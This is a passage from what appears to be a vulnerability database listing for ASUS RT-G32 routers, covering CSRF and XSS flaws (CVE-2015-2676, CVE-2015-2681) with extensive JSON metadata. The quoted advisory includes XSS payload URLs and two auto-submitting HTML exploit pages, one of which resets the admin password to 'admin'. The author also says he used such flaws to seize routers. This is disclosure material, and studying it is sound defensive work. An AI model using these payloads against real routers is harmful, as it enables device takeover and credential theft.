Search criteria
3 vulnerabilities found for rt-g32 by asus
VAR-201503-0298
Vulnerability from variot - Updated: 2023-12-18 12:38Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm. ASUS RT-G32 routers is a router device. Asus RT-G32 is prone to a cross-site request-forgery vulnerability. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected device. Other attacks are also possible.
Affected products:
Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2.
Details:
Cross-Site Scripting (WASC-08):
http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
These vulnerabilities work as via GET, as via POST (work even without authorization).
ASUS RT-G32 XSS-1.html
ASUS RT-G32 XSS exploit (C) 2015 MustLiveCross-Site Request Forgery (WASC-09):
CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).
ASUS RT-G32 CSRF-1.html
ASUS RT-G32 CSRF exploit (C) 2015 MustLiveI found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).
Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201503-0298",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.3.2"
},
{
"model": "rt-g32",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.3.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "BID",
"id": "73294"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:asus:rt-g32_firmware:2.0.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:asus:rt-g32_firmware:2.0.2.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:asus:rt-g32:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2676"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MustLive",
"sources": [
{
"db": "BID",
"id": "73294"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 0.4
},
"cve": "CVE-2015-2676",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-2676",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-01969",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-80637",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-2676",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-01969",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201503-421",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-80637",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "VULHUB",
"id": "VHN-80637"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm. ASUS RT-G32 routers is a router device. Asus RT-G32 is prone to a cross-site request-forgery vulnerability. \nAn attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected device. Other attacks are also possible. \n\n-------------------------\nAffected products:\n-------------------------\n\nVulnerable is the next model: ASUS RT-G32 with different versions of\nfirmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and\n2.0.3.2. \n\n----------\nDetails:\n----------\n\nCross-Site Scripting (WASC-08):\n\nhttp://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27\n\nhttp://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27\n\nThese vulnerabilities work as via GET, as via POST (work even without\nauthorization). \n\nASUS RT-G32 XSS-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 XSS exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"next_page\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"group_id\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"action_script\"\nvalue=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"flag\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nCross-Site Request Forgery (WASC-09):\n\nCSRF vulnerability allows to change different settings, including admin\u0027s\npassword. As I showed in this exploit (post-auth). \n\nASUS RT-G32 CSRF-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 CSRF exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"v_password2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"action_mode\" value=\"+Apply+\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nI found this and other routers since summer to take control over terrorists\nin Crimea, Donetsk \u0026 Lugansks regions of Ukraine. Read about it in the list\n(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)\nand in many my interviews\n(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). \n\nI mentioned about these vulnerabilities at my site\n(http://websecurity.com.ua/7644/). \n\nBest wishes \u0026 regards,\nMustLive\nAdministrator of Websecurity web site\nhttp://websecurity.com.ua \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "BID",
"id": "73294"
},
{
"db": "VULHUB",
"id": "VHN-80637"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2676",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "130724",
"trust": 2.6
},
{
"db": "BID",
"id": "73294",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201503-421",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2015-01969",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-80637",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "VULHUB",
"id": "VHN-80637"
},
{
"db": "BID",
"id": "73294"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"id": "VAR-201503-0298",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "VULHUB",
"id": "VHN-80637"
}
],
"trust": 1.12424244
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
}
]
},
"last_update_date": "2023-12-18T12:38:03.503000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-G32",
"trust": 0.8,
"url": "http://www.asus.com/networking/rtg32/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80637"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "NVD",
"id": "CVE-2015-2676"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html"
},
{
"trust": 2.5,
"url": "http://websecurity.com.ua/7644/"
},
{
"trust": 2.0,
"url": "http://seclists.org/fulldisclosure/2015/mar/42"
},
{
"trust": 1.4,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2676"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/73294"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2676"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
},
{
"trust": 0.3,
"url": "http://www.asus.com/networking/rtg32/"
},
{
"trust": 0.1,
"url": "http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua/7644/)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "VULHUB",
"id": "VHN-80637"
},
{
"db": "BID",
"id": "73294"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"db": "VULHUB",
"id": "VHN-80637"
},
{
"db": "BID",
"id": "73294"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"date": "2015-03-23T00:00:00",
"db": "VULHUB",
"id": "VHN-80637"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73294"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"date": "2015-03-07T11:11:11",
"db": "PACKETSTORM",
"id": "130724"
},
{
"date": "2015-03-23T16:59:03.617000",
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01969"
},
{
"date": "2016-12-03T00:00:00",
"db": "VULHUB",
"id": "VHN-80637"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73294"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001913"
},
{
"date": "2016-12-03T03:05:38.080000",
"db": "NVD",
"id": "CVE-2015-2676"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asus RT-G32 Cross-site request forgery vulnerability in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001913"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-421"
}
],
"trust": 0.6
}
}
VAR-201503-0303
Vulnerability from variot - Updated: 2023-12-18 12:38Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information.
Details:
Cross-Site Scripting (WASC-08):
http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
These vulnerabilities work as via GET, as via POST (work even without authorization).
ASUS RT-G32 XSS-1.html
ASUS RT-G32 XSS exploit (C) 2015 MustLiveCross-Site Request Forgery (WASC-09):
CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).
ASUS RT-G32 CSRF-1.html
ASUS RT-G32 CSRF exploit (C) 2015 MustLiveI found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).
Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201503-0303",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.3.2"
},
{
"model": "rt-g32",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.3.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:asus:rt-g32_firmware:2.0.2.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:asus:rt-g32_firmware:2.0.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MustLive",
"sources": [
{
"db": "BID",
"id": "73296"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 0.4
},
"cve": "CVE-2015-2681",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2015-2681",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-01955",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-80642",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
